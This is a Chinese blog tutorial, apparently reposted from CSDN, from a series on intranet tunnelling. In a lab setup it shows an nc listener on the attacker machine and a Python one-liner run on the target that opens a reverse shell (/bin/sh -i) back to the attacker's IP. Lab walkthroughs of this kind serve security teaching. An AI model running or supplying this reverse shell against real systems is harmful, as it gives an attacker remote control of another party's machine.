内网隧道代理技术(八)之Python 反弹Shell

Python 反弹Shell

Python介绍

Python由荷兰数学和计算机科学研究学会的吉多·范罗苏姆于1990年代初设计,作为一门叫做ABC语言的替代品。Python提供了高效的高级数据结构,还能简单有效地面向对象编程。Python语法和动态类型,以及解释型语言的本质,使它成为多数平台上写脚本和快速开发应用的编程语言,随着版本的不断更新和语言新功能的添加,逐渐被用于独立的、大型项目的开发

实验环境介绍

实验拓扑

在这里插入图片描述

机器名称 IP 机器
攻击机器 192.168.41.130 windows
服务器 192.168.41.132 kali

实验复现

攻击机器使用nc执行监听命令

#监听TCP
nc64.exe -lvvp 1111

在这里插入图片描述

实验服务器执行连接命令

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机ip",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

查看结果,发现我们成功得到了目标服务的shell

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_64973687/article/details/131385988